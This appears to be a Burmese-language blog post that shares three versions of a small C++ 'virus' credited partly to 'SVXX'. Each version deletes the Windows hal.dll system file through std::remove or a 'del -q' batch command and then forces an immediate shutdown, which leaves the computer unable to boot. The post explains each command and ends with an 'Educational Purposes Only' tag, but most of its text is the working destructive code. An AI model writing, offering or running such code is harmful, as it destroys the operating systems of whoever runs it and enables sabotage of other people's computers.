ဒီ virus ကေတာ့ Hal.dll ဖိုင္ကို deletes လုပ္တဲ႔ virus ပါ။ virus စအလုပ္လုပ္ျပီး ဖိုင္ကို deleting လုပ္ျပီးျပီးဆိုတာနဲ႔ Virus တိုက္ခိုက္ခံရတဲ႔ ကြန္ျပဴတာဟာ Shuts down
က်သြားပါလိမ့္မယ္။ ျပီးရင္ ျပန္ဖြင့္လို႔မရေတာ့ပါဘူး။ စမ္းသပ္ဖို႔မေကာင္းတဲ႔ Virus တမ်ိဳးပါပဲ... ကိုယ့္ဆီမွာလည္း မစမ္းနဲ႔ သူမ်ားကြန္ျပဴတာကိုလည္း သြားမစမ္းတာ ေကာင္းတာပါပဲ။
Orginal Code ကေတာ့ ......
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
အထက္မွာ ျပခဲ႔တဲ႔ Virus ကေတာ့ C:\\windows\\ ကိုသာတိုက္ခိုက္ႏိုင္ပါတယ္။ အကယ္၍ တျခား drive တစ္ခုမွာ Windows ကိုတင္ထားမယ္ဆုိရင္ေတာ့ တုိက္ခိုက္ခံရမွာ မဟုတ္ပါဘူး။ အခုျပမယ့္ second version ကေတာ့ ဘယ္ drive မွာပဲ Windows တင္တင္ တိုက္ခိုက္ႏိုင္ပါတယ္။
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
ေနာက္တစ္ခုကေတာ့ SVXX's Version ပါ။ ဒီ Virus မွာေတာ့ Batch commands ေတြကို အမ်ားဆံုးသံုးထားပါတယ္။
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
system("PAUSE");
return EXIT_SUCCESS;
}
"del" command ကေတာ့ stuff ေတြကို delete လုပ္ဖို႔အတြက္ DOS မွာ သံုးတဲ႔ command ပါ။ "-q" ကေတာ့ force delete (သို႔) အေမးအျမန္းမရွိ ဖ်က္ပါလို႔ အဓိပၸာယ္ရတဲ႔ parameter တစ္ခုပါ။ shutdown -s -f -t 00 ရဲ႕ အဓိပၸာယ္ကေတာ့ အားလံုး running ျပီးတဲ႔အခါမွာ 00 စကၠန္႔အတြင္း Shutdown,force close လုပ္ပါဆိုတဲ႔ အဓိပၸာယ္ပါ။
(Educational Purposes Only)
by ကိုလင္း-သလႅာ၀တီ
0 comments:
Post a Comment